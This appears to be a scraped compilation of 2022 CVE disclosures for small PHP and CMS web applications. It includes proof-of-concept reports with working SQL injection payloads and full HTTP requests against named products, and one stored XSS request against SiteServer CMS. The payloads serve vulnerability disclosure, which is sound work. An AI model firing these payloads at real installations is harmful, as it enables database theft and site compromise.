Online Ordering System By janobe 2.3.2 is vulneranle to SQL Injection via /ordering/index.php?q=products&id=.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System By janobe has SQL injection vulnerability**

Author： k0xx

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/index.php?q=products&id=

Vulnerability location: /ordering/index.php?q=products&id= //id is Injection point

\[+\]Payload: /ordering/index.php?q=products&id=2%27%20and%20length(database())%20=12--+ //id is Injection point

Current database name: multistoredb,length is 12

GET /ordering/index.php?q\=products&id\=2%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

When length (database ()) = 11, Content-Length: 17564 

When length (database ()) = 12, Content-Length: 24330

CVE-2022-31327: bug_report/SQLi-1.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/admin/services/view_service.php?id=.

Permalink

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/admin/services/view\_service.php?id=

Vulnerability location: /ocwbs/admin/services/view\_service.php?id=, id

Current database name: ocwbs\_db,length is 8

\[+\] Payload: /ocwbs/admin/services/view\_service.php?id=2%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /ocwbs/admin/services/view\_service.php?id\=2%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close

When length (database ()) = 7, Content-Length: 856 

When length (database ()) = 8, Content-Length: 932

CVE-2022-31353: bug_report/SQLi-8.md at main · k0xx11/bug_report

Ecommerce-project-with-php-and-mysqli-Fruits-Bazar 1.0 is vulnerable to SQL Injection in \search_product.php via the keyword parameters.

creativesaiful / **Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-** Public

*   Notifications
*   Fork 2
*   Star 3
    

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

3 stars 2 forks

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

master

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

creativesaiful somthing

c07a847

Sep 16, 2021

somthing

c07a847

**Git stats**

*   **25** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

admin

assets

includes

json

addtocart.php

all\_product.php

catagory.php

ecommerce.sql

exist\_order.php

index.php

readme.txt

search\_product.php

single\_product.php

user\_login.php

user\_password\_recover.php

user\_password\_update.php

user\_register.php

userprofile copy.php

userprofile.php

**readme.txt**

1\. First create a database name ecommerce in your database. Than import ecommerce.sql file in your ecommerce database.

admin access:
saifulislamsapon@gmail.com
pass:1234


user access:
saifulislamsapon@gmail.com
123

**About**

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

**Topics**

ecommerce-website php-website php-project core-php project-samples php-admin-panel project-example basic-ecommerce full-stack-web-development

**Resources**

Readme

**Stars**

**3** stars

**Watchers**

**1** watching

**Forks**

**2** forks

**Releases**

No releases published

**Packages**

No packages published  

**Languages**

*   CSS 36.7%
*   JavaScript 29.0%
*   SCSS 25.1%
*   PHP 8.6%
*   Hack 0.6%

CVE-2022-30478: GitHub - creativesaiful/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-: This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

CVE-2022-30470: FileRun - Selfhosted File Manager with Sharing and Backup for Photos, Docs & More

siteserver SSCMS 6.15.51 is vulnerable to Cross Site Scripting (XSS).

测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-v6.15.51/siteserver\_install.zip  
SiteServer: V6.15.51  
测试环境：windows 2012 R2  
数据库 sql server 2016  
  
(需要登录测试)  
漏洞url:/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  

包体  
\`POST /SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1 HTTP/1.1  
Host: 192.168.39.3:8055  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 304  
Origin: http://192.168.39.3:8055  
Connection: close  
Referer: http://192.168.39.3:8055/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  
Cookie: BAIRONG.VC.ADMINLOGIN=oeLExOp9UBM0equals0; ss\_administrator\_access\_token=M3ENIa3NKJJ39JCRHnY4PgfJqMC7lFjggL0e9S06Bs9ubZE90add0xM2aesaL0add0Cxo8Xe5VZrSanerzFU8oZaMXCC9KMxdw29fLk6uNSSoY4Pa0add0BOZfzRwKT2t3LglumO4sTUKSz0slash0ubJ9QajCyTsKpmbPu7yv20add08zpsQyVPpl3TuMITkOCIX1EwcC7CeIJ50slash0XQ9d0slash0oR8ECV0add0690add0eXRHbEImnZsLBsrhv7KML0Jhuevbhvcjs0equals0; ASP.NET\_SessionId=l3tothqgmzbgljaogh1uof3y; SS-ADMIN-TOKEN=z69iWbk6QAgWtUmPiJBXDd7vXmikE7IMRbVWfh0add00xyMUHXn13zDSbfJyodBLcAQuP9kU0slash0F7SybZwZUK7ER9csWj0ODr7NgSqXfVWABfJpKMXGuT2wQudsXkhDU9JMvsrkNIPV5cKDS3vGUQNyPwFtxt7YFaPv4h0slash09w0slash0UOjfXLezfaa1ML5HzkaV5p1JCQWmJTQEnr7CYs7SWD7Jqq2Ifc0slash0oUvADaZFl2TmYxcUUCqEQ0equals00secret0  
Upgrade-Insecure-Requests: 1

\_\_EVENTTARGET=&\_\_EVENTARGUMENT=&\_\_VIEWSTATE=MVZqB4shzUeYHIX5zAuRZJJbL8r72A7Evx94mUbTTNpGbOwWBZkeb79FVsI2zTj0PlNYIzK%2BpEzx3SRf96HflbXA8nFVIpCU16GBIeWZSq4vLCZLjX0CoHWGwnxNyQzo&\_\_VIEWSTATEGENERATOR=4DCED64B&TbItemName=%3Csvg+onload%3Dalert%28document.domain%29%3E&TbItemValue=2222&ctl04=%E7%A1%AE+%E5%AE%9A\`

CVE-2022-30349: 跨站脚本攻击(xss) · Issue #3238 · siteserver/cms

phpABook 0.9i is vulnerable to SQL Injection due to insufficient sanitization of user-supplied data in the "auth_user" parameter in index.php script.

**Vulnerability identifier:** #VU54518

**Vulnerability risk:** High

**CVSSv3.1:** 9 \[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C\]

**CVE-ID:** N/A

**CWE-ID:** CWE-89  

**Exploitation vector:** Network

**Exploit availability:** No

**Vulnerable software:**  
phpABook  
Web applications / Modules and components for CMS

**Vendor:** Gilnei Moraes

**Description**  

The vulnerability allows a remote attacker to execute arbitrary SQL queries in database.

The vulnerability exists due to insufficient sanitization of user-supplied data in the "auth\_user" parameter in index.php script. A remote attacker can send a specially crafted request to the affected application and execute arbitrary SQL commands within the application database.

Successful exploitation of this vulnerability may allow a remote attacker to read, delete, modify data in database and gain complete control over the affected application.

**Mitigation**  
Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

**Vulnerable software versions**

phpABook: 0.9i

**CPE**

*   cpe:2.3:a:gilnei\_moraes:phpabook:0.9i:\*:\*:\*:\*:\*:\*:\*

**External links**  
http://packetstormsecurity.com/files/163312  
http://www.exploit-db.com/exploits/50071

**Q & A**

**Can this vulnerability be exploited remotely?**

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

**Is there known malware, which exploits this vulnerability?**

No. We are not aware of malware exploiting this vulnerability.

CVE-2022-30352: SQL injection in phpABook

Simple Bus Ticket Booking System 1.0 is vulnerable to SQL Injection via /SimpleBusTicket/index.php.

**Simple Bus Ticket Booking System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/simple-bus-ticket-booking-system-in-php-with-source-code/

Vulnerability File: /SimpleBusTicket/index.php

Vulnerability location: /SimpleBusTicket/index.php, phr

\[+\] Payload: pnr=111' union select 1,2,3,4,database(),6,7,8--+&pnr-search=

dbname = sbtbsphp ---> length = 8

POST /SimpleBusTicket/index.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
pnr=111' union select 1,2,3,4,database(),6,7,8--+&pnr-search=

CVE-2022-30817: bug_report/SQLi-1.md at main · k0xx11/bug_report

elitecms v1.01 is vulnerable to SQL Injection via /admin/add_sidebar.php.

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: /admin/add\_sidebar.php

Vulnerability location: ip/eliteCMS1.01/admin/add\_sidebar.php?page=, page

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/add\_sidebar.php?page=-1%20union%20select%201,2,3,4,database(),6,7,8,9,10,11--+&sidebar=3 // Leak place ---> page

GET /eliteCMS1.01/admin/add\_sidebar.php?page\=\-1%20union%20select%201,2,3,4,database(),6,7,8,9,10,11\--+&sidebar=3 HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30814: bug_report/SQLi-5.md at main · k0xx11/bug_report

elitecms v1.01 is vulnerable to SQL Injection via admin/edit_post.php.

Permalink

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: /admin/edit\_post.php

Vulnerability location: ip/eliteCMS1.01/admin/edit\_post.php?page=1&post=, post

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/edit\_post.php?page=1&post=-1%20union%20select%201,2,3,4,database(),6--+ // Leak place ---> post

GET /eliteCMS1.01/admin/edit\_post.php?page\=1&post\=\-1%20union%20select%201,2,3,4,database(),6\--\+ HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30810: bug_report/SQLi-2.md at main · k0xx11/bug_report

elitecms 1.01 is vulnerable to SQL Injection via /admin/add_post.php.

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: /admin/add\_post.php

Vulnerability location: ip/eliteCMS1.01/admin/add\_post.php?page=, page

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/add\_post.php?page=-3%20union%20select%201,2,3,4,database(),6,7,8,9,10,11--+ // Leak place ---> page

GET /eliteCMS1.01/admin/add\_post.php?page\=\-3%20union%20select%201,2,3,4,database(),6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

Tag

#sql